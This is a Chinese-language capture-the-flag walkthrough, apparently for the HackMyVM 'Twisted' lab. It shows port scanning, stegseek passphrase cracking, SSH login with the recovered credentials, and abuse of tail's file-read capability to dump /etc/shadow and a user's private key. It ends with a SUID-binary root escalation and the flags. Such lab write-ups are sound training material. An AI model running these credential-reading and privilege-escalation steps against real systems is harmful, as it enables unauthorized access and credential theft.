Nmap
先扫全端口:
┌──(kali㉿kali)-[/tmp/235]
└─$ nmap -p0-65535 --min-rate 5000 192.168.205.235
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-19 08:25 -0400
Nmap scan report for 192.168.205.235
Host is up (0.00032s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
MAC Address: 08:00:27:C3:24:40 (Oracle VirtualBox virtual NIC)开放 80/2222,版本识别确认 2222 是 SSH。
Web 80
首页内容:
<h1>I love cats!</h1>
<img src="cat-original.jpg" alt="Cat original" width="400" height="400">
<br>
<h1>But I prefer this one because seems different</h1>
<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400"> 页面展示两张猫图片,cat-hidden.jpg 注释"seems different"暗示隐写。
Stegseek 破解隐写
下载图片后用 stegseek 暴力破解:
┌──(kali㉿kali)-[/tmp/235]
└─$ stegseek cat-hidden.jpg /mnt/hgfs/gx/x/5000q.txt -xf stegout.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "stegout.txt".隐写密码 sexymama,原始文件名 mateo.txt。提示这是用户 mateo 的信息。
读取提取内容:
┌──(kali㉿kali)-[/tmp/235]
└─$ cat stegout.txt
thisismypassword得到凭据 mateo:thisismypassword。
SSH mateo
┌──(kali㉿kali)-[/tmp/235]
└─$ ssh -p 2222 mateo@192.168.205.235uid=1000(mateo) gid=1000(mateo) groups=1000(mateo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)读取家目录的 note。
mateo@twisted:~$ cat note.txt
/var/www/html/gogogo.wavgogogo.wav 摩尔斯码解码
下载 wav 文件分析频率与节奏,发现是标准摩尔斯码音频(长音240ms=划,短音90ms=点):
--. --- -.. . . .--. . .-. ... -.-. --- -- . .-- .. - .... -- . ... .-.. .. - - .-.. . .-. .- -... -... .. - ...
解码结果:
GO DEEPER... COME WITH ME... LITTLE RABBIT...
兔子洞。
Capability 提权
枚举 capability 发现:
mateo@twisted:~$ /sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+eptail 具有 cap_dac_read_search,可以绕过文件读权限限制。
读取 /etc/shadow:
mateo@twisted:~$ tail /etc/shadow
mateo:$6$j5ATD8qkkcGCCU1h$...:18549:0:99999:7:::
markus:$6$kHfI3QtIBB47N75s$...:18549:0:99999:7:::
bonita:$6$8JsoW6Q5O8faA1cd$...:18549:0:99999:7:::读取 markus 的 note(mateo 无权直接读):
mateo@twisted:~$ tail /home/markus/note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
HMVblackcat关键信息:/var/cache/apt/id_rsa 存放 bonita 的 SSH 私钥。
读取 bonita 的私钥:
mateo@twisted:~$ tail -n +1 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
...
-----END OPENSSH PRIVATE KEY-----SSH bonita
┌──(kali㉿kali)-[/tmp/235]
└─$ chmod 600 id_rsa_bonita && ssh -i id_rsa_bonita -o StrictHostKeyChecking=no -p 2222 bonita@192.168.205.235
bonita@twisted:~$ id
uid=1002(bonita) gid=1002(bonita) groups=1002(bonita)SUID 提权
家目录下发现 SUID 文件 beroot。
-rwsrws--- 1 root bonita 16864 Oct 14 2020 /home/bonita/beroot运行时要求输入 code:
bonita@twisted:~$ /home/bonita/beroot
Enter the code:
WRONG反汇编 main 函数:
0000000000001185 <main>:
11a5: lea -0x4(%rbp),%rax
11a9: mov %rax,%rsi
11ac: lea 0xe63(%rip),%rdi # "%d" 格式字符串
11b8: call scanf@plt
11bd: mov -0x4(%rbp),%eax
11c0: cmp $0x16f8,%eax # 比较 0x16f8 = 5880
11c5: jne 11f8 <main+0x73>
11c7: call setuid@plt # setuid(0)
11e0: call setgid@plt # setgid(0)
11e5: lea "/bin/bash",%rdi
11f1: call system@plt # system("/bin/bash")
11f8: lea "WRONG",%rdi
11ff: call puts@plt程序读入一个整数 %d,与 0x16f8(十进制 5880)比较,正确则 setuid(0)+setgid(0)+system("/bin/bash")。
Root
交互式输入 5880:
bonita@twisted:~$ /home/bonita/beroot
Enter the code:
5880
root@twisted:~# id
uid=0(root) gid=0(root) groups=0(root),1002(bonita)
root@twisted:~# cat /root/root.txt
HMVwhereismycatuser flag:
root@twisted:~# cat /home/bonita/user.txt
HMVblackcat